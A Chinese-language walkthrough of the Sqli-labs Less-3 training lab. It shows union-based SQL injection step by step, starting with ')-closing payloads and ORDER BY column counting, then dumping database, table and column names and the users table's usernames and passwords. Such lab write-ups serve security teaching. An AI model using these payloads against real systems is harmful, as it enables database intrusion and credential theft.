打开页面后提示“请输入参数id,并为它赋一个数字值”。

Sqli-labs Less-3 Union注入

1、寻找注入点

输入?id=1 正常;输入?id=1' 报错,说明存在sql注入漏洞。

查看后台源码发现如下查询语句,与Less-2 基于错误的GET整型注入区别在于,构建payload新增')单引号右括号,)右括号表示变形!

SELECT * FROM users WHERE id=('$id') LIMIT 0,1

2、查询该数据表中的字段数量

输入?id=1') order by 3 --+ 正常;

输入?id=1') order by 4 --+ 报错,说明该数据表中字段数为3。

3、爆数据库

?id=-1') union select 1,2,database() --+

Sqli-labs Less-3 Union注入

4、爆数据表

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

Sqli-labs Less-3 Union注入

5、爆数据列(字段)

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+

Sqli-labs Less-3 Union注入

6、爆数据值

?id=-1') union select 1,2,group_concat(username,0x3a,password) from users--+

Sqli-labs Less-3 Union注入

相关文章:

  • 2022-01-19
  • 2021-08-20
  • 2021-12-30
  • 2022-02-24
  • 2021-10-01
  • 2021-06-19
  • 2021-06-02
  • 2021-09-22
猜你喜欢
  • 2021-10-19
  • 2021-06-20
  • 2021-07-28
  • 2021-10-02
  • 2022-01-19
  • 2021-07-23
  • 2022-02-19
相关资源
相似解决方案